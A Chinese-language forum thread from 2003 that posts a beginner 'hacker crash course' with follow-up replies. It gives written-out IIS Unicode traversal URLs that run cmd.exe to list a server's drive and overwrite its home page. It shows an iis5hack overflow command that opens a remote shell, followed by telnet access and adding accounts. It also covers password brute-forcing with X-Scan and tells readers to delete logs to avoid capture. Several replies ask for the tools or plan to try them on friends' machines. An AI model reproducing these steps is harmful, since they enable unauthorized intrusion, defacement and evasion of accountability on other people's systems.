設為首頁收藏本站

 取回密碼
 註冊
搜尋
熱搜: Redump discuz
檢視: 675|回覆: 12

【教學】 初級Hacker速成班

[複製連結]
發表於 2003年7月3日 00:20:27 | 顯示全部內容 |閱讀模式
有來學習的成員請多多留言 ... thanks

文件名稱:初級駭客教學 第一集 by Roy
文件作者:Roy
登錄時間:2003-01-08 13:16:15 - BY [roychiang]
--------------------------------------------------------------------------------
COPYRIGHT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Roy Chiang
https://www.dandyhardware.com/vbb/home.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. 掃窗口(port)
port是一個很重要的東西,如果你知道他所有有開的port的話,那你就可以從某個port開始hacking.
22 SSH 爽拉
21 FTP重要哦
23 TELNET賺到拉
25 STMP沒啥用ㄋㄟ
53 DOMAIN... 不想說了
80HTTP看網頁用的拉
110POP收信的(要破E-MAIL嗎?)
139 NETBOIS暴重要的!!!
3389win2000超級終端,最爽的一個
2. 破密碼(password)
大部分的密碼檔不是很好,不過有些很好<== 檔案超大的,不過勉強可用,<== 可以自己加歐!

3. 萬國碼(UNICODE)
雖然很老了,不過還是有很多主機都有UNICODE的BUG. 像是韓國的,一堆, 大陸的呢? 少之又少,因為怕被HACK,所以都有補

4. 烘培雞(FRONTPAGE)
很多人都以為說裝的FRONTPAGE EXTEND,可以讓網頁變好,但是像很多HACKER,可以直接用FRONTPAGE直接改網頁.
講了那麼多,終於要開始來玩了<== 爽爽爽
首先要先挑一隻肥肥嫩嫩的來玩,就先玩 https://www.newhacker.com/ 吧(隨便舉例)
要先找到他的IP歐,所以呢,請到CMD來PING它吧
C:>ping www.newhacker.com
Pinging www.newhacker.com [255.255.255.255] with 32 bytes of data:
Reply from 255.255.255.255: bytes=32 time=183ms TTL=238 …
阿他的IP不小心的被我PING出來了ㄟ
先掃掃看他的PORT 22 SSH,21 FTP,25 TELNET,53 DOMAIN,80 HTTP,110 POP,139 NETBOIS,3389 WIN2000 終端機 … 真多PORT阿
改首頁
請先拿出 X-SCAN 2.2 哈哈哈,他要死了,來掃unicode.
範例: https://www.newhacker.com/scripts/..%c1%1c../winnt/system32/_cmd_.exe?/
c+dir 哇,他的硬碟的東西都秀出來了歐. 來改他的主頁,那先找到他的路徑吧,請 dir 所有的資料夾來找吧,哈,他的路徑是c:inetpubwwwrootindex.html
https://www.newhacker.com/scripts/..%c1%1c../winnt/system32/cmd”.exe?/c+echo+hackedbytaiwan+>c:inetpubwwwrootindex.html
cgi錯誤, 不用裡他,現在到首頁去看看.爽爽爽,我的名稱被貼上去了,哈哈哈.
還有,要記的刪除紀錄歐,不然被抓我可不管歐.

IIS 溢出
據說緩衝區溢出攻擊是黑客入侵時70%所選的方法,看起來有點誇張,但確實有道理,因為暴力密碼破解在網絡上變得非常之慢,而像unicode的解碼漏洞所取得的權限又太低,而緩衝區溢出一般可取得system權限,是非常有用的!

具體原理我也不是很清楚,只能說個大概:當我們向系統發出超出緩衝區大小的數據處理請求時,便會引發溢出,並彈出錯誤對話框,我們常看到的「非法操作」其實也是可能是由於溢出。而當溢出時,eip發生錯誤,有彙編知識的朋友應該記得,eip是控制執行代碼的位置(順便問一下,有沒有會crack的高人,記得做我老師)這時加入一段惡性代碼,算好發生溢出時的eip值,這樣溢出時就會執行惡性代碼而不是當掉。非法操作我們知道多的不得了,因此……溢出攻擊是非常強大的!

由於彙編對於我們來說較難掌握,加之對溢出的瞭解很有限,那麼我們只能借助高手們的程序來黑了。

具體方法:

1,準備iishack,不要跟我要,該版本可以對多種系統進行攻擊。

2,用x-scan或流光掃瞄一個有iis.printer漏洞的主機,然後就可以攻擊了。

3,在命令行方式執行iis5hack (主機ip) (端口號,默認80)(系統代號,具體可參考程序的說明) ( shell口)

例如:iis5hack 255.255.255.255 80 1 111(以為在111端口開一個shell)

4,用telnet連上,telnet 255.255.255.255 111,成的話就可以控制機器了,加個用戶,做個代理……

密碼暴力破解
最好用的就是X-SCAN了,速度快,不過就是密碼檔太濫了,有空的話可以自己加
設定一番,上路吧!你可以睡覺,可以去machine(就是做作業),可以去讀書……就是不要傻等。為什麼呢?因為會傷視力的:)
作者文章推薦
發表於 2003年9月16日 18:31:07 | 顯示全部內容
好像不錯
不過我沒那麼利害
只好先找朋友的電腦來試試看
我要回覆
發表於 2003年9月27日 16:12:23 | 顯示全部內容
看起來大大您真的很強喔...^^
我要回覆
發表於 2004年1月17日 17:11:24 | 顯示全部內容
方法是不錯,不過我好像掃不到這樣的網站哦
我要回覆
發表於 2004年1月18日 10:50:00 | 顯示全部內容
謝謝大大分享,不過這樣可能要讓很多工程師傷腦筋了^^
我要回覆
發表於 2004年1月27日 18:19:10 | 顯示全部內容
不錯的文章哦..
謝謝大大的教學...
我要回覆
發表於 2004年5月14日 20:06:51 | 顯示全部內容
thanks!!!
我要回覆
發表於 2004年7月16日 19:01:56 | 顯示全部內容
誰可以給我iishack  和 x-scan的軟體或打上下載網址
我要回覆
發表於 2005年5月10日 09:21:35 | 顯示全部內容
很神的樣子ㄟ!!真想學學ㄟ!!感恩啦!!
我要回覆
發表於 2006年2月21日 02:48:21 | 顯示全部內容
不過我沒那麼利害
只好先找朋友的電腦來試試看
我要回覆
發表於 2006年3月17日 19:40:55 | 顯示全部內容
好像很好玩耶~
不過都沒有軟體下載位址....只能乾瞪眼~
還是~謝謝~
我要回覆
發表於 2006年10月9日 15:16:44 | 顯示全部內容
好利害喔!大大一定有研究!真佩服大大阿!不過好像很難ㄟ!
我要回覆
發表於 2006年10月29日 20:32:51 | 顯示全部內容
缺流光....可以提供一下嗎?
我要回覆
懶得打字嗎?讓本助手協助你 【使用進階編輯器請點選右方進階模式】
您需要登入後才可以回覆 登入 | 註冊

本版積分規則

手機版|Archiver|漁家小舖

GMT+8, 2024年12月22日 11:58 , Processed in 0.282141 second(s), 52 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回覆 返回頂端 返回清單